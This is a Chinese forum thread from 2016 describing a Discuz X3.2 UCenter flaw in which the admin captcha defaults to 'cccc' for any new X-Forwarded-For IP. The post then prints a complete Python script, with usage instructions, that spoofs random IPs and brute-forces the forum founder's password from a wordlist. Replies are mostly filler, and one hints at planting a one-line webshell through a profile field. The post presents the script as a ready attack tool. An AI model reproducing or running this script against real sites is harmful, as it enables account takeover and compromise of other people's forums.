忘记密码?

一键登录

草根吧源码论坛

Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破

查看: 3637|回复: 80

Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破

  [复制链接]

1724

主题

2222

热度

684

贡献

民审

Rank: 8Rank: 8

发表于 2016-3-30 19:56:54 | 显示全部楼层 |阅读模式 | 百度  360  谷歌 
分享到:
本帖最后由 民审-M 于 2016-3-30 19:58 编辑

只要知道了账号密码,就相当于拿下了论坛,可以为所欲为了。对于这种重要的东西,一直都是黑客们想要的东西,而对付它的好办法除了社工就是爆破了。社工不是我们这个帖子的目的,我们就开始讲爆破。而一般的爆破在验证码下显得那么无力,爆破的前提就是没有验证码和密码输错,还有知道账号的限制,这里只有没有密码输错限制,还有默认的账号名,了个验证码当阻碍,但是我们发现了一个小问题。导致这个验证码被无视掉,直接进行爆破。这个漏洞的发现者是JJ Fly,乌云漏洞地址为http://www.wooyun.org/bugs/wooyun-2014-080211,下面的内容大部分从乌云截取。

这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922。

草根吧 Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破 localhost,验证码,创始人,发现者,黑客 精品教程 2106555215e9de33121ac345e389897e7a033bb1

但是
      经过测试发现
      登陆uc_server的时候 如果ip第一次出现那么 seccode的默认值为cccc
      而 ip地址 是通过X-Forwarded-For 获取的。
      也就是我们修改xff的ip之后,再次打开上面那个验证码url,图片的值为cccc

草根吧 Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破 localhost,验证码,创始人,发现者,黑客 精品教程 21071436735b1f7ae3a6d308d74b2a37b80b090e

所有,根据这个漏洞,就可以进行爆破,下面是该漏洞作者给出的漏洞利用exp:

  1. #!/usr/bin/env python
  2. # -*- coding: cp936 -*-
  3. #Dz论坛创始人爆破脚本
  4. #由爱安全攻防实验室夕阳编写
  5. import httplib
  6. import re
  7. import random
  8. import urllib
  9. import time
  10. from sys import argv
  11. def GetHtml(host,htmlhash,htmlpass,htmlseccode):
  12.         ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))
  13.         postHead={"Host":host,"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 ","X-Forwarded-For":ip,'Content-Type':'application/x-www-form-urlencoded','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}
  14.         postContent='sid=&formhash='+htmlhash+'&seccodehidden='+htmlseccode+'&iframe=0&isfounder=1&password='+htmlpass+'&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'
  15.         resultHtml=httplib.HTTPConnection(host)
  16.         resultHtml.request('POST','/uc_server/admin.php?m=user&a=login',postContent,postHead )
  17.         page=resultHtml.getresponse()
  18.         pageConect=page.read()
  19.         return pageConect

  20. def GetHash(host):
  21.         url='http://'+host+'/uc_server/admin.php'
  22.         pageContent=urllib.urlopen(url).read()
  23.         htmlhash=re.findall('<input type="hidden" name="formhash" value="(.*?)" />',pageContent)
  24.         htmlseccode=re.findall('<input type="hidden" name="seccodehidden" value="(.*?)" />',pageContent)
  25.         return htmlhash+htmlseccode


  26. if(len(argv)==1):
  27. print '             . .............................................. .'
  28. print '             .. ...  ....isssssssssssssssssssssssssr,...   ... '
  29. print '             . . .,,. ..ihSSSSSSSSSSSSSSSSSSSS5S991,. .::, .. .'
  30. print '             . :ishhi,   .i1555555555555555555331,  .:s55hs,  .'
  31. print '             . r15SSShi,   .i15SSSSSSSSSSS5S331:  .:s5SS5S3;  .'
  32. print '             . r1SSSSSShi,   .ihSSSSSSSSSS99h:  .:s5SSSSSSS;  '
  33. print '             . ;sSSSSS33Shi,   ,ihS3333399h:  .:sS33SSSSS3S:  .'
  34. print '             . .;hS33333333hi,   ,r55hhSh;  .:sS33333333S91,. .'
  35. print '             . .,sS3333333333hi,.  .. ..  .:sS333333333S39r.. .'
  36. print '             . ..;5S333333333S31..........,sS3333333333S95, . .'
  37. print '             . ..,13333333333S31..........,1S333333333SS9r .. .'
  38. print '             . ...rS3333333SS991.       ...rS333333333S3S: .. .'
  39. print '             . ...:h33333SS995;. .,;::;:. ..:s5333333SS91.... .'
  40. print '             . ...,sSS3SS995;   ,s5SSSSS1;.   :sS3333S33; ... .'
  41. print '             . ....;533995;   ,r533333333S1;.   :s53398h,.... .'
  42. print '             . .....,i1h;  .,r5333333333333S1;.  .:s51;,..... .'
  43. print '             . .....     ..;53333333333333SS33h;.. ..  ...... .'
  44. print '             . ............,;shS333S33SSS39935s:............. .'
  45. print '             . ............   .,i15S33993S1;,   ............. .'
  46. print '             .                   .ii11i,                     .'
  47. print '                                                                               '
  48. print '                                                                               '
  49. print '                    欢迎使用Dz论坛无视验证码爆破创始人密码工具                     '
  50. print '-------------------------------------------------------------------------------'
  51. print '|                             Team:爱安全攻防实验室                           |'
  52. print '|                                  Author:夕阳                                |'
  53. print '|                              site:www.ixsec.org                             |'
  54. print '|                        如果有BUG请联系我的QQ:1478023488                    |'
  55. print '-------------------------------------------------------------------------------'
  56. print ' 使用说明        |  参数格式—>       host地址      字典文件    '
  57. print '字典放在当前目录 |  参数格式—>      www.xxx.com    pass.txt    '
  58. else:
  59.         host=argv[1]
  60.         passfile=argv[2]
  61.         print '网站host为  '+host
  62.         print '密码字典为  '+passfile
  63.         print '--->开始破解,请耐心等候才怪'
  64.         x=GetHash(host)
  65.         for i in open(passfile):
  66.                 if(GetHtml(host,x[0],i,x[1])==''):
  67.                         print '密码为 '+i
  68.                         break
复制代码

更多:

游客,如果您要查看本帖隐藏内容请回复

帖子地址: 

本文来源于草根吧源码论坛 www.caogen8.co,欢迎大家下载。
如果您没有贡献需要充值,可以直接在线充值,点击充值
如果你需要加入本站赞助VIP会员,可以直接在线开通,点击开通
如果找不到您要的资源,请搜索一下,点击搜索
回复

举报

2

主题

219

热度

16

贡献

禁止访问

发表于 2016-3-31 04:54:59 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽

0

主题

48

热度

0

贡献

步入草根

Rank: 1

发表于 2016-4-2 13:07:22 | 显示全部楼层
ll论坛创始人无视验证码

4

主题

233

热度

18

贡献

步入草根

Rank: 1

发表于 2016-4-4 23:12:05 | 显示全部楼层
怎么修复

1

主题

11

热度

0

贡献

步入草根

Rank: 1

发表于 2016-4-16 01:57:50 | 显示全部楼层

UC漏洞直接拿shell论坛创始人无视验证码爆破 [修改]

1

主题

73

热度

0

贡献

步入草根

Rank: 1

发表于 2016-4-17 00:04:01 | 显示全部楼层
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破

0

主题

16

热度

0

贡献

步入草根

Rank: 1

发表于 2016-5-15 18:07:52 | 显示全部楼层
Dz论坛创始人爆破脚本:Discuz论坛创始人无视验证码爆破工具2016最新修复版 Dz论坛创始人爆破脚本:Discuz论坛创始人无视验证码爆破工具2016最新修复版 Dz论坛创始人爆破脚本:Discuz论坛创始人无视验证码爆破工具2016最新修复版 Dz论坛创始人爆破脚本:Discuz论坛创始人无视验证码爆破工具2016最新修复版

0

主题

65

热度

5

贡献

终身赞助ViP

Rank: 7Rank: 7Rank: 7

发表于 2016-5-16 16:28:34 | 显示全部楼层
洞直接拿shell论坛创始人无视验证码爆破 [修改]

2

主题

167

热度

33

贡献

年费赞助ViP

Rank: 6Rank: 6

发表于 2016-5-17 23:30:42 来自手机 | 显示全部楼层
啦咯啦咯啦咯啦咯啦咯

3

主题

168

热度

20

贡献

年费赞助ViP

Rank: 6Rank: 6

发表于 2016-5-19 23:34:13 | 显示全部楼层
z论坛个人资料用户栏目出生地栏目可能导致可执行一句话

发表回复

您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表